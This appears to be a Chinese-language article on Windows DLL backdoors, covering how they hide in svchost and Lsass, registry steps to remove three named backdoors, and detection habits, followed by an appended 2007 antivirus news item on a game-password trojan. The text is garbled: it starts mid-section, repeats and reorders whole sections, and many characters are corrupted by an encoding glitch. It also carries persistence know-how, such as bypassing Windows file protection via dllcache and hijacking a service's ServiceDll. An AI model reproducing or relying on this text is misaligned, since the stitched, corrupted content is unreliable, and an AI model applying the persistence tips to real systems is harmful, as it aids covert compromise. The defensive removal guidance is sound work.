后門的Loader把SvchostDLL.dll插入Svchost進(jìn)程當(dāng)中,所以,我們先打開Windows優(yōu)化大師中的Windows進(jìn)程管理2.5,查看Svchost進(jìn)程中的模塊信息(如圖3),從圖3中我們可以看到,SvchostDLL.dll已經(jīng)插入到Svchost進(jìn)程中了,在根據(jù)"直接使用現(xiàn)有組里的一個(gè)服務(wù)名,但是本機(jī)沒有安裝的服務(wù)"的提示,我們可以斷定,在"管理工具"—"服務(wù)"中會有一項(xiàng)新的服務(wù)。圖4證明了我的說法,此服務(wù)名稱為:IPRIP,由Svchost啟動,-k netsvcs表示此服務(wù)包含在netsvcs服務(wù)組中。
我們把該服務(wù)停掉,然后打開注冊表編輯器(開始—運(yùn)行--regedit),來到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\IPRIP下,查看其Parameters子鍵(如圖5)。Program鍵的鍵值SvcHostDLL.exe為后門的Loader;ServiceDll的鍵值C:\WINNT\system32\svchostdll.dll為調(diào)用的DLL文件,這正是后門的DLL文件。現(xiàn)在我們刪除IPRIP子鍵(或者用SC來刪除),然后在來到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost下,編輯netsvcs服務(wù)組,把49 00 70 00 72 00 69 00 70 00 00 00刪除,這里對應(yīng)的就是IPRIP的服務(wù)名,具體如圖6所示。然后退出,重啟。重啟之后刪除WINNT\system32目錄下的后門文件即可。
2,BITS.dll
這是榕哥的作品,也是DLL后門,和SvchostDLL.dll原理基本一樣,不過這里使用的是上邊介紹的第四種方法,即"修改現(xiàn)有組里的現(xiàn)有服務(wù),把它的ServiceDll指向自己的DLL后門"。換句話說,該后門修改現(xiàn)有的某一個(gè)服務(wù),把其原有服務(wù)的DLL指向自己(也就是BITS.dll),這樣就達(dá)到了自動加載的目的;其次,該后門沒有自己的Loader,而是使用系統(tǒng)自帶的Rundll32.exe來加載。我們還是用Windows 進(jìn)程管理2.5來查看,從圖7中,我們可以看到bits.dll已經(jīng)插入到Svchost進(jìn)程當(dāng)中。
好,現(xiàn)在我們來看看具體的清除方法,由于該后門是修改現(xiàn)有服務(wù),而我們并不知道具體是修改了哪個(gè)服務(wù),所以,在注冊表中搜索bits.dll,最后在HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RasAuto下搜索到了bits.dll,查看Parameters子鍵下的ServiceDll,其鍵值為C:\WINNT\system32\bits.dll(如圖8)。原來,該后門把RasAuto服務(wù)原來的DLL文件替換為bits.dll了,這樣來實(shí)現(xiàn)自動加載。知道了原因就好辦了,現(xiàn)在我們把ServiceDll的鍵值修改為RasAuto服務(wù)原有的DLL文件,即%SystemRoot%\System32\rasauto.dll,退出,重啟。之后刪除WINNT\system32目錄下的bits.dll即可。
3,NOIR--QUEEN
NOIR--QUEEN(守護(hù)者)是一個(gè)DLL后門&木馬程序,服務(wù)端以DLL文件的形式插入到系統(tǒng)的Lsass.exe進(jìn)程里,由于Lsass.exe是系統(tǒng)的關(guān)鍵進(jìn)程,所以不能終止。在來介紹清除方法之前,我先介紹一下Lsass.exe進(jìn)程:
這是一個(gè)本地的安全授權(quán)服務(wù),并且它會為使用Winlogon服務(wù)的授權(quán)用戶生成一個(gè)進(jìn)程,如果授權(quán)是成功的,Lsass就會產(chǎn)生用戶的進(jìn)入令牌,令牌使用啟動初始 的Shell。其他的由用戶初始化的進(jìn)程會繼承這個(gè)令牌。
從上邊的介紹我們就可以看出Lsass對系統(tǒng)的重要性,那具體怎么清除呢?請看下文。
后門在安裝成功后,會在服務(wù)中添加一個(gè)名為QoSserver的服務(wù),并把QoSserver.dll后門文件插入到Lsass進(jìn)程當(dāng)中,使其可以隱藏進(jìn)程并自動啟動(如圖9)。現(xiàn)在我們打開注冊表,來到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\QoSserver,直接刪除QoSserver鍵,然后重啟。重啟之后,我們在來到服務(wù)列表中,會看到QoSserver服務(wù)還在,但沒有啟動,類別是自動,我們把他修改為"已禁用";然后往上看,會發(fā)現(xiàn)一個(gè)服務(wù)名為AppCPI的服務(wù),其可執(zhí)行程序指向QoSserver.exe(原因后邊我會說到),具體如圖11所示。我們再次打開注冊表,來到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AppCPI,刪除AppCPI鍵,重啟,再刪除QoSserver,最后刪除WINNT\system32目錄下的后門文件。
本人和這個(gè)后門"搏斗"了3個(gè)多小時(shí),重啟N次。原因在于即使刪除了QoSserver服務(wù),后門還是在運(yùn)行,而且服務(wù)列表中的QoSserver服務(wù)又"死灰復(fù)燃"。后來才知道原因:在我刪除了QoSserver服務(wù)并重啟之后,插入到Lsass進(jìn)程當(dāng)中的QoSserver.dll文件又恢復(fù)了QoSserver服務(wù),并且生成了另外一個(gè)服務(wù),即AppCPI,所以我們必須在到注冊表中刪除AppCPI服務(wù)才算是把該后門清除。由此可以看出,現(xiàn)在的后門的保護(hù)措施,真是一環(huán)扣環(huán)。
注意:在刪除QoSserver服務(wù)并重啟之后,恢復(fù)的QoSserver的啟動類別要修改為"已禁用",否則即便刪除了AppCPI服務(wù),QoSserver服務(wù)又運(yùn)行了。
三,DLL的防范
看了上邊的例子,我想大家對清除DLL后門的方法有了一定的了解,但在現(xiàn)實(shí)中,DLL后門并不會使用默認(rèn)的文件名,所以你也就不能肯定是否中了DLL后門。對于DLL后門,system32目錄下是個(gè)好地方,大多數(shù)后門也是如此,所以這里要非常注意。下面我來具體介紹一下怎么發(fā)現(xiàn)DLL后門,希望對大家有所幫助。
1,安裝好系統(tǒng)和所有的應(yīng)用程序之后,備份system32目錄下的EXE和DLL文件:打開CMD,來到WINNT\system32目錄下,執(zhí)行:dir *.exe>exe.txt & dir *.dll>dll.txt,這樣,就會把所有的EXE和DLL文件備份到exe.txt和dll.txt文件中;日后,如發(fā)現(xiàn)異常,可以使用相同的命令再次備份EXE和DLL文件(這里我們假設(shè)是exe0.txt和dll0.txt),并使用:fc exe.txt exe0.txt>exedll.txt & fc dll.txt dll0.txt>exedll.txt,其意思為使用FC命令比較兩次的EXE文件和DLL文件,并將比較結(jié)果保存到exedll.txt文件中。通過這種方法,我們就可以發(fā)現(xiàn)多出來的EXE和DLL文件,并通過文件大小,創(chuàng)建時(shí)間來判斷是否是DLL后門。
2,使用內(nèi)存/模塊工具來查看進(jìn)程調(diào)用的DLL文件,比如Windows優(yōu)化大師中的Windows 進(jìn)程管理 2.5。這樣,可以發(fā)現(xiàn)進(jìn)程到底調(diào)用了什么DLL文件,在結(jié)合上邊用FC命令比較出來的結(jié)果,又能進(jìn)一步來確定是否中了DLL后門。如果沒有優(yōu)化大師,可以使用TaskList,這個(gè)小工具也可以顯示進(jìn)程調(diào)用的DLL文件,而且還有源代碼,方便修改。
3,普通后門連接需要打開特定的端口,DLL后門也不例外,不管它怎么隱藏,連接的時(shí)候都需要打開端口。我們可以用netstat -an來查看所有TCP/UDP端口的連接,以發(fā)現(xiàn)非法連接。大家平時(shí)要對自己打開的端口心中有數(shù),并對netstat -an中的state屬性有所了解。當(dāng)然,也可以使用Fport來顯示端口對應(yīng)的進(jìn)程,這樣,系統(tǒng)有什么不明的連接和端口,都可以盡收眼底。
4,定期檢查系統(tǒng)自動加載的地方,比如:注冊表,Winstart.bat,Autoexec.bat,win.ini,system.ini,wininit.ini,Autorun.inf,Config.sys等。其次是對服務(wù)進(jìn)行管理,對系統(tǒng)默認(rèn)的服務(wù)要有所了解,在發(fā)現(xiàn)有問題的服務(wù)時(shí),可以使用Windows 2000 Server Resource Kit中的SC來刪除。以上這些地方都可以用來加載DLL后門的Loader,如果我們把DLL后門Loader刪除了,試問?DLL后門還怎么運(yùn)行?!
通過使用上邊的方法,我想大多數(shù)DLL后門都可以"現(xiàn)形",如果我們平時(shí)多做一些備份,那對查找DLL后門會啟到事半功倍的效果。
后門!相信這個(gè)詞語對您來說一定不會陌生,它的危害不然而欲,但隨著人們的安全意識逐步增強(qiáng),又加上殺毒軟件的"大力支持",使傳統(tǒng)的后門無法在隱藏自己,任何稍微有點(diǎn)計(jì)算機(jī)知識的人,都知道"查端口""看進(jìn)程",以便發(fā)現(xiàn)一些"蛛絲馬跡"。所以,后門的編寫者及時(shí)調(diào)整了思路,把目光放到了動態(tài)鏈接程序庫上,也就是說,把后門做成DLL文件,然后由某一個(gè)EXE做為載體,或者使用Rundll32.exe來啟動,這樣就不會有進(jìn)程,不開端口等特點(diǎn),也就實(shí)現(xiàn)了進(jìn)程、端口的隱藏。本文以"DLL的原理""DLL的清除""DLL的防范"為主題,并展開論述,旨在能讓大家對DLL后門"快速上手",不在恐懼DLL后門。好了,進(jìn)入我們的主題。
一,DLL的原理
1,動態(tài)鏈接程序庫
動態(tài)鏈接程序庫,全稱:Dynamic Link Library,簡稱:DLL,作用在于為應(yīng)用程序提供擴(kuò)展功能。應(yīng)用程序想要調(diào)用DLL文件,需要跟其進(jìn)行"動態(tài)鏈接";從編程的角度,應(yīng)用程序需要知道DLL文件導(dǎo)出的API函數(shù)方可調(diào)用。由此可見,DLL文件本身并不可以運(yùn)行,需要應(yīng)用程序調(diào)用。正因?yàn)镈LL文件運(yùn)行時(shí)必須插入到應(yīng)用程序的內(nèi)存模塊當(dāng)中,這就說明了:DLL文件無法刪除。這是由于Windows內(nèi)部機(jī)制造成的:正在運(yùn)行的程序不能關(guān)閉。所以,DLL后門由此而生!2,DLL后門原理及特點(diǎn)
把一個(gè)實(shí)現(xiàn)了后門功能的代碼寫成一個(gè)DLL文件,然后插入到一個(gè)EXE文件當(dāng)中,使其可以執(zhí)行,這樣就不需要占用進(jìn)程,也就沒有相對應(yīng)的PID號,也就可以在任務(wù)管理器中隱藏。DLL文件本身和EXE文件相差不大,但必須使用程序(EXE)調(diào)用才能執(zhí)行DLL文件。DLL文件的執(zhí)行,需要EXE文件加載,但EXE想要加載DLL文件,需要知道一個(gè)DLL文件的入口函數(shù)(既DLL文件的導(dǎo)出函數(shù)),所以,根據(jù)DLL文件的編寫標(biāo)準(zhǔn):EXE必須執(zhí)行DLL文件中的DLLMain()作為加載的條件(如同EXE的mian())。做DLL后門基本分為兩種:1)把所有功能都在DLL文件中實(shí)現(xiàn);2)把DLL做成一個(gè)啟動文件,在需要的時(shí)候啟動一個(gè)普通的EXE后門。
常見的編寫方法:
(1),只有一個(gè)DLL文件
這類后門很簡單,只把自己做成一個(gè)DLL文件,在注冊表Run鍵值或其他可以被系統(tǒng)自動加載的地方,使用Rundll32.exe來自動啟動。Rundll32.exe是什么?顧名思意,"執(zhí)行32位的DLL文件"。它的作用是執(zhí)行DLL文件中的內(nèi)部函數(shù),這樣在進(jìn)程當(dāng)中,只會有Rundll32.exe,而不會有DLL后門的進(jìn)程,這樣,就實(shí)現(xiàn)了進(jìn)程上的隱藏。如果看到系統(tǒng)中有多個(gè)Rundll32.exe,不必驚慌,這證明用Rundll32.exe啟動了多少個(gè)的DLL文件。當(dāng)然,這些Rundll32.exe執(zhí)行的DLL文件是什么,我們都可以從系統(tǒng)自動加載的地方找到。
現(xiàn)在,我來介紹一下Rundll32.exe這個(gè)文件,意思上邊已經(jīng)說過,功能就是以命令行的方式調(diào)用動態(tài)鏈接程序庫。系統(tǒng)中還有一個(gè)Rundll.exe文件,他的意思是"執(zhí)行16位的DLL文件",這里要注意一下。在來看看Rundll32.exe使用的函數(shù)原型:
Void CALLBACK FunctionName (
HWND hwnd,
HINSTANCE hinst,
LPTSTR lpCmdLine,
Int nCmdShow
);
其命令行下的使用方法為:Rundll32.exe DLLname,Functionname [Arguments]
DLLname為需要執(zhí)行的DLL文件名;Functionname為前邊需要執(zhí)行的DLL文件的具體引出函數(shù);[Arguments]為引出函數(shù)的具體參數(shù)。
(2),替換系統(tǒng)中的DLL文件
這類后門就比上邊的先進(jìn)了一些,它把實(shí)現(xiàn)了后門功能的代碼做成一個(gè)和系統(tǒng)匹配的DLL文件,并把原來的DLL文件改名。遇到應(yīng)用程序請求原來的DLL文件時(shí), DLL后門就啟一個(gè)轉(zhuǎn)發(fā)的作用,把"參數(shù)"傳遞給原來的DLL文件;如果遇到特殊的請求時(shí)(比如客戶端),DLL后門就開始,啟動并運(yùn)行了。對于這類后門,把所有操作都在DLL文件中實(shí)現(xiàn)最為安全,但需要的編程知識也非常多,也非常不容易編寫。所以,這類后門一般都是把DLL文件做成一個(gè)"啟動"文件,在遇到特殊的情況下(比如客戶端的請求),就啟動一個(gè)普通的EXE后門;在客戶端結(jié)束連接之后,把EXE后門停止,然后DLL文件進(jìn)入"休息"狀態(tài),在下次客戶端連接之前,都不會啟動。但隨著微軟的"數(shù)字簽名"和"文件恢復(fù)"的功能出臺,這種后門已經(jīng)逐步衰落。
提示:
在WINNT\system32目錄下,有一個(gè)dllcache文件夾,里邊存放著眾多DLL文件(也包括一些重要的EXE文件),在DLL文件被非法修改之后,系統(tǒng)就從這里來恢復(fù)被修改的DLL文件。如果要修改某個(gè)DLL文件,首先應(yīng)該把dllcache目錄下的同名DLL文件刪除或更名,否則系統(tǒng)會自動恢復(fù)。
(3),動態(tài)嵌入式
這才是DLL后門最常用的方法。其意義是將DLL文件嵌入到正在運(yùn)行的系統(tǒng)進(jìn)程當(dāng)中。在Windows系統(tǒng)中,每個(gè)進(jìn)程都有自己的私有內(nèi)存空間,但還是有種種方法來進(jìn)入其進(jìn)程的私有內(nèi)存空間,來實(shí)現(xiàn)動態(tài)嵌入式。由于系統(tǒng)的關(guān)鍵進(jìn)程是不能終止的,所以這類后門非常隱蔽,查殺也非常困難。常見的動態(tài)嵌入式有:"掛接API""全局鉤子(HOOK)""遠(yuǎn)程線程"等。
遠(yuǎn)程線程技術(shù)指的是通過在一個(gè)進(jìn)程中創(chuàng)建遠(yuǎn)程線程的方法來進(jìn)入那個(gè)進(jìn)程的內(nèi)存地址空間。當(dāng)EXE載體(或Rundll32.exe)在那個(gè)被插入的進(jìn)程里創(chuàng)建了遠(yuǎn)程線程,并命令它執(zhí)行某個(gè)DLL文件時(shí),我們的DLL后門就掛上去執(zhí)行了,這里不會產(chǎn)生新的進(jìn)程,要想讓DLL后門停止,只有讓這個(gè)鏈接DLL后門的進(jìn)程終止。但如果和某些系統(tǒng)的關(guān)鍵進(jìn)程鏈接,那就不能終止了,如果你終止了系統(tǒng)進(jìn)程,那Windows也隨即被終止!!!
3,DLL后門的啟動特性
啟動DLL后門的載體EXE是不可缺少的,也是非常重要的,它被稱為:Loader。如果沒有Loader,那我們的DLL后門如何啟動呢?因此,一個(gè)好的DLL后門會盡力保護(hù)自己的Loader不被查殺。Loader的方式有很多,可以是為我們的DLL后門而專門編寫的一個(gè)EXE文件;也可以是系統(tǒng)自帶的Rundll32.exe,即使停止了Rundll32.exe,DLL后門的主體還是存在的。3721網(wǎng)絡(luò)實(shí)名就是一個(gè)例子,雖然它并不是"真正"的后門。
二,DLL的清除
本節(jié)以三款比較有名的DLL后門例,分別為"SvchostDLL.dll""BITS.dll""QoServer.dll"。詳細(xì)講解其手工清除方法。希望大家在看過這三款DLL后門的清除方法之后,能夠舉一反三,靈活運(yùn)用,在不懼怕DLL后門。其實(shí),手工清除DLL后門還是比較簡單的,無非就是在注冊表中做文章。具體怎么做,請看下文。
1,PortLess BackDoor
這是一款功能非常強(qiáng)大的DLL后門程序,除了可以獲得Local System權(quán)限的Shell之外,還支持如"檢測克隆帳戶""安裝終端服務(wù)"等一系列功能(具體可以參見程序幫助),適用Windows2000/xp/2003等系統(tǒng)。程序使用svchost.exe來啟動,平常不開端口,可以進(jìn)行反向連接(最大的特點(diǎn)哦),對于有防火墻的主機(jī)來說,這個(gè)功能在好不過了。
在介紹清除方法之前,我們先來簡單的介紹一下svchost.exe這個(gè)系統(tǒng)的關(guān)鍵服務(wù):
Svchost只是做為服務(wù)的宿主,本身并不實(shí)現(xiàn)什么功能,如果需要使用Svchost來啟動服務(wù),則某個(gè)服務(wù)是以DLL形式實(shí)現(xiàn)的,該DLL的載體Loader指向svchost,所以,在啟動服務(wù)的時(shí)候由svchost調(diào)用該服務(wù)的DLL來實(shí)現(xiàn)啟動的目的。使用svchost啟動某個(gè)服務(wù)的DLL文件是由注冊表中的參數(shù)來決定的,在需要啟動服務(wù)的下邊都有一個(gè)Parameters子鍵,其中的ServiceDll表明該服務(wù)由哪個(gè)DLL文件負(fù)責(zé),并且這個(gè)DLL文件必須導(dǎo)出一個(gè)ServiceMain()函數(shù),為處理服務(wù)任務(wù)提供支持。
呵呵!看了上邊的理論,是不是有點(diǎn)蒙(我都快睡著了),別著急,我們來看看具體的內(nèi)容(如圖1)。從圖1中,我們可以看到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RpcSs下的Parameters子鍵,其鍵值為%SystemRoot%\system32\rpcss.dll。這就說明:啟動RpcSs服務(wù)時(shí)。Svchost調(diào)用WINNT\system32目錄下的rpcss.dll。
在來看看圖2,這是注冊表的HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost,里邊存放著Svchost啟動的組和組內(nèi)的各個(gè)服務(wù),其中netsvcs組的服務(wù)最多。要使用Svchost啟動某個(gè)服務(wù),則該服務(wù)名就會出現(xiàn)在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost下。這里有四種方法來實(shí)現(xiàn):
1, 添加一個(gè)新的組,在組里添加服務(wù)名
2, 在現(xiàn)有組里添加服務(wù)名
3, 直接使用現(xiàn)有組里的一個(gè)服務(wù)名,但是本機(jī)沒有安裝的服務(wù)
4, 修改現(xiàn)有組里的現(xiàn)有服務(wù),把它的ServiceDll指向自己的DLL后門
我測試的PortLess BackDoor使用的第三種方法。
好了,我想大家看完了上邊的原理,一定可以想到我們清除PortLess BackDoor的方法了,對,就是在注冊表的Svchost鍵下做文章。好,我們現(xiàn)在開始。
注:由于本文只是介紹清除方法,使用方法在此略過。
后門的Loader把SvchostDLL.dll插入Svchost進(jìn)程當(dāng)中,所以,我們先打開Windows優(yōu)化大師中的Windows進(jìn)程管理2.5,查看Svchost進(jìn)程中的模塊信息(如圖3),從圖3中我們可以看到,SvchostDLL.dll已經(jīng)插入到Svchost進(jìn)程中了,在根據(jù)"直接使用現(xiàn)有組里的一個(gè)服務(wù)名,但是本機(jī)沒有安裝的服務(wù)"的提示,我們可以斷定,在"管理工具"—"服務(wù)"中會有一項(xiàng)新的服務(wù)。圖4證明了我的說法,此服務(wù)名稱為:IPRIP,由Svchost啟動,-k netsvcs表示此服務(wù)包含在netsvcs服務(wù)組中。
我們把該服務(wù)停掉,然后打開注冊表編輯器(開始—運(yùn)行--regedit),來到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\IPRIP下,查看其Parameters子鍵(如圖5)。Program鍵的鍵值SvcHostDLL.exe為后門的Loader;ServiceDll的鍵值C:\WINNT\system32\svchostdll.dll為調(diào)用的DLL文件,這正是后門的DLL文件。現(xiàn)在我們刪除IPRIP子鍵(或者用SC來刪除),然后在來到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost下,編輯netsvcs服務(wù)組,把49 00 70 00 72 00 69 00 70 00 00 00刪除,這里對應(yīng)的就是IPRIP的服務(wù)名,具體如圖6所示。然后退出,重啟。重啟之后刪除WINNT\system32目錄下的后門文件即可。
2,BITS.dll
這是榕哥的作品,也是DLL后門,和SvchostDLL.dll原理基本一樣,不過這里使用的是上邊介紹的第四種方法,即"修改現(xiàn)有組里的現(xiàn)有服務(wù),把它的ServiceDll指向自己的DLL后門"。換句話說,該后門修改現(xiàn)有的某一個(gè)服務(wù),把其原有服務(wù)的DLL指向自己(也就是BITS.dll),這樣就達(dá)到了自動加載的目的;其次,該后門沒有自己的Loader,而是使用系統(tǒng)自帶的Rundll32.exe來加載。我們還是用Windows 進(jìn)程管理2.5來查看,從圖7中,我們可以看到bits.dll已經(jīng)插入到Svchost進(jìn)程當(dāng)中。
好,現(xiàn)在我們來看看具體的清除方法,由于該后門是修改現(xiàn)有服務(wù),而我們并不知道具體是修改了哪個(gè)服務(wù),所以,在注冊表中搜索bits.dll,最后在HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RasAuto下搜索到了bits.dll,查看Parameters子鍵下的ServiceDll,其鍵值為C:\WINNT\system32\bits.dll(如圖8)。原來,該后門把RasAuto服務(wù)原來的DLL文件替換為bits.dll了,這樣來實(shí)現(xiàn)自動加載。知道了原因就好辦了,現(xiàn)在我們把ServiceDll的鍵值修改為RasAuto服務(wù)原有的DLL文件,即%SystemRoot%\System32\rasauto.dll,退出,重啟。之后刪除WINNT\system32目錄下的bits.dll即可。
3,NOIR--QUEEN
NOIR--QUEEN(守護(hù)者)是一個(gè)DLL后門&木馬程序,服務(wù)端以DLL文件的形式插入到系統(tǒng)的Lsass.exe進(jìn)程里,由于Lsass.exe是系統(tǒng)的關(guān)鍵進(jìn)程,所以不能終止。在來介紹清除方法之前,我先介紹一下Lsass.exe進(jìn)程:
這是一個(gè)本地的安全授權(quán)服務(wù),并且它會為使用Winlogon服務(wù)的授權(quán)用戶生成一個(gè)進(jìn)程,如果授權(quán)是成功的,Lsass就會產(chǎn)生用戶的進(jìn)入令牌,令牌使用啟動初始 的Shell。其他的由用戶初始化的進(jìn)程會繼承這個(gè)令牌。
從上邊的介紹我們就可以看出Lsass對系統(tǒng)的重要性,那具體怎么清除呢?請看下文。
后門在安裝成功后,會在服務(wù)中添加一個(gè)名為QoSserver的服務(wù),并把QoSserver.dll后門文件插入到Lsass進(jìn)程當(dāng)中,使其可以隱藏進(jìn)程并自動啟動(如圖9)。現(xiàn)在我們打開注冊表,來到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\QoSserver,直接刪除QoSserver鍵,然后重啟。重啟之后,我們在來到服務(wù)列表中,會看到QoSserver服務(wù)還在,但沒有啟動,類別是自動,我們把他修改為"已禁用";然后往上看,會發(fā)現(xiàn)一個(gè)服務(wù)名為AppCPI的服務(wù),其可執(zhí)行程序指向QoSserver.exe(原因后邊我會說到),具體如圖11所示。我們再次打開注冊表,來到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AppCPI,刪除AppCPI鍵,重啟,再刪除QoSserver,最后刪除WINNT\system32目錄下的后門文件。
本人和這個(gè)后門"搏斗"了3個(gè)多小時(shí),重啟N次。原因在于即使刪除了QoSserver服務(wù),后門還是在運(yùn)行,而且服務(wù)列表中的QoSserver服務(wù)又"死灰復(fù)燃"。后來才知道原因:在我刪除了QoSserver服務(wù)并重啟之后,插入到Lsass進(jìn)程當(dāng)中的QoSserver.dll文件又恢復(fù)了QoSserver服務(wù),并且生成了另外一個(gè)服務(wù),即AppCPI,所以我們必須在到注冊表中刪除AppCPI服務(wù)才算是把該后門清除。由此可以看出,現(xiàn)在的后門的保護(hù)措施,真是一環(huán)扣環(huán)。
注意:在刪除QoSserver服務(wù)并重啟之后,恢復(fù)的QoSserver的啟動類別要修改為"已禁用",否則即便刪除了AppCPI服務(wù),QoSserver服務(wù)又運(yùn)行了。
三,DLL的防范
看了上邊的例子,我想大家對清除DLL后門的方法有了一定的了解,但在現(xiàn)實(shí)中,DLL后門并不會使用默認(rèn)的文件名,所以你也就不能肯定是否中了DLL后門。對于DLL后門,system32目錄下是個(gè)好地方,大多數(shù)后門也是如此,所以這里要非常注意。下面我來具體介紹一下怎么發(fā)現(xiàn)DLL后門,希望對大家有所幫助。
1,安裝好系統(tǒng)和所有的應(yīng)用程序之后,備份system32目錄下的EXE和DLL文件:打開CMD,來到WINNT\system32目錄下,執(zhí)行:dir *.exe>exe.txt & dir *.dll>dll.txt,這樣,就會把所有的EXE和DLL文件備份到exe.txt和dll.txt文件中;日后,如發(fā)現(xiàn)異常,可以使用相同的命令再次備份EXE和DLL文件(這里我們假設(shè)是exe0.txt和dll0.txt),并使用:fc exe.txt exe0.txt>exedll.txt & fc dll.txt dll0.txt>exedll.txt,其意思為使用FC命令比較兩次的EXE文件和DLL文件,并將比較結(jié)果保存到exedll.txt文件中。通過這種方法,我們就可以發(fā)現(xiàn)多出來的EXE和DLL文件,并通過文件大小,創(chuàng)建時(shí)間來判斷是否是DLL后門。
2,使用內(nèi)存/模塊工具來查看進(jìn)程調(diào)用的DLL文件,比如Windows優(yōu)化大師中的Windows 進(jìn)程管理 2.5。這樣,可以發(fā)現(xiàn)進(jìn)程到底調(diào)用了什么DLL文件,在結(jié)合上邊用FC命令比較出來的結(jié)果,又能進(jìn)一步來確定是否中了DLL后門。如果沒有優(yōu)化大師,可以使用TaskList,這個(gè)小工具也可以顯示進(jìn)程調(diào)用的DLL文件,而且還有源代碼,方便修改。
3,普通后門連接需要打開特定的端口,DLL后門也不例外,不管它怎么隱藏,連接的時(shí)候都需要打開端口。我們可以用netstat -an來查看所有TCP/UDP端口的連接,以發(fā)現(xiàn)非法連接。大家平時(shí)要對自己打開的端口心中有數(shù),并對netstat -an中的state屬性有所了解。當(dāng)然,也可以使用Fport來顯示端口對應(yīng)的進(jìn)程,這樣,系統(tǒng)有什么不明的連接和端口,都可以盡收眼底。
4,定期檢查系統(tǒng)自動加載的地方,比如:注冊表,Winstart.bat,Autoexec.bat,win.ini,system.ini,wininit.ini,Autorun.inf,Config.sys等。其次是對服務(wù)進(jìn)行管理,對系統(tǒng)默認(rèn)的服務(wù)要有所了解,在發(fā)現(xiàn)有問題的服務(wù)時(shí),可以使用Windows 2000 Server Resource Kit中的SC來刪除。以上這些地方都可以用來加載DLL后門的Loader,如果我們把DLL后門Loader刪除了,試問?DLL后門還怎么運(yùn)行?!
通過使用上邊的方法,我想大多數(shù)DLL后門都可以"現(xiàn)形",如果我們平時(shí)多做一些備份,那對查找DLL后門會啟到事半功倍的效果。
“落雪”木馬瘋狂盜號 下載江民專殺
[ 2007-03-25 02:35:17 | 作者: sun ]
近期,江民科技反病毒中心陸續(xù)接到網(wǎng)絡(luò)游戲玩家報(bào)告,他們正在使用的網(wǎng)絡(luò)游戲帳號莫名被盜,而且電腦中正在使用的殺毒軟件也突然異常終止工作。據(jù)游戲玩家反映,多款品牌的殺毒軟件都存在被異常終止的現(xiàn)象,而重新啟動殺毒軟件殺毒后,病毒仍然會出現(xiàn),屢殺不絕。
接到用戶舉報(bào)后,江民反病毒中心立即對用戶上報(bào)的可疑文件樣本進(jìn)行分析,經(jīng)分析,導(dǎo)致網(wǎng)絡(luò)游戲玩家?guī)ぬ柋槐I的原因是電腦感染了一名為“落雪”的木馬病毒。“落雪”木馬可以盜取包括魔獸世界、傳奇世界、征途、夢幻西游、邊鋒游戲在內(nèi)的多款網(wǎng)絡(luò)游戲的帳號和密碼,對網(wǎng)絡(luò)游戲玩家的游戲裝備構(gòu)成了極大的威脅。
“落雪”木馬也叫“游戲大盜”( Trojan/PSW.GamePass),由VB 程序語言編寫,通過 nSPack 3.1 加殼處理(即通常所說的“北斗殼”North Star),該木馬文件圖標(biāo)一般是紅色的圖案,偽裝成網(wǎng)絡(luò)游戲的登陸器。
病毒運(yùn)行后,在C盤program file以及windows目錄下生成winlogon.exe、regedit.com等14個(gè)病毒文件,病毒文件之多比較少見,,事實(shí)上這14個(gè)不同文件名的病毒文件系同一種文件,“落雪”之名亦可能由此而來。病毒文件名被模擬成正常的系統(tǒng)工具名稱,但是文件擴(kuò)展名變成了 .com。江民反病毒工程師分析,這是病毒利用了Windows操作系統(tǒng)執(zhí)行.com文件的優(yōu)先級比EXE文件高的特性,這樣,當(dāng)用戶調(diào)用系統(tǒng)配置文件Msconfig.exe的時(shí)候,一般習(xí)慣上輸入 Msconfig,而這是執(zhí)行的并不是微軟的Msconfig.exe程序,而是病毒文件 Msconfig.com ,病毒作者的“良苦用心”由此可見。病毒另一狡詐之處還有,病毒還創(chuàng)建一名為winlogon.exe的進(jìn)程,并把 winlogon.exe 的路徑指向c:\windows\winlogon.exe,而正常的系統(tǒng)進(jìn)程路徑是C:\WINDOWS\system32\ winlogon.exe,以此達(dá)到迷惑用戶的目的。
江民反病毒工程師介紹,除了在C盤下生成很多病毒文件外,病毒還修改注冊表文件關(guān)聯(lián),每當(dāng)用戶點(diǎn)擊html文件時(shí),都會運(yùn)行病毒。此外,病毒還在D盤下生成一個(gè)自動運(yùn)行批處理文件,這樣即使C盤目錄下的病毒文件被清除,當(dāng)用戶打開D盤時(shí),病毒仍然被激活運(yùn)行。這也是許多用戶反映病毒屢殺不絕的原因。
針對“落雪”病毒,江民殺毒軟件KV系列產(chǎn)品已及時(shí)升級,用戶只需升級病毒庫到最新狀態(tài)、開啟病毒實(shí)時(shí)監(jiān)控即可有效防殺該病毒,亦可使用江民未知病毒檢測功能處理該病毒。沒有安裝殺毒軟件的用戶,也可以下載使用江民“落雪”木馬專殺工具進(jìn)行殺毒,以免遭“落雪”病毒侵害。
江民“落雪”病毒專殺工具下載地址:
http://www.jiangmin.com/download/TrojanKiller.rar
接到用戶舉報(bào)后,江民反病毒中心立即對用戶上報(bào)的可疑文件樣本進(jìn)行分析,經(jīng)分析,導(dǎo)致網(wǎng)絡(luò)游戲玩家?guī)ぬ柋槐I的原因是電腦感染了一名為“落雪”的木馬病毒。“落雪”木馬可以盜取包括魔獸世界、傳奇世界、征途、夢幻西游、邊鋒游戲在內(nèi)的多款網(wǎng)絡(luò)游戲的帳號和密碼,對網(wǎng)絡(luò)游戲玩家的游戲裝備構(gòu)成了極大的威脅。
“落雪”木馬也叫“游戲大盜”( Trojan/PSW.GamePass),由VB 程序語言編寫,通過 nSPack 3.1 加殼處理(即通常所說的“北斗殼”North Star),該木馬文件圖標(biāo)一般是紅色的圖案,偽裝成網(wǎng)絡(luò)游戲的登陸器。
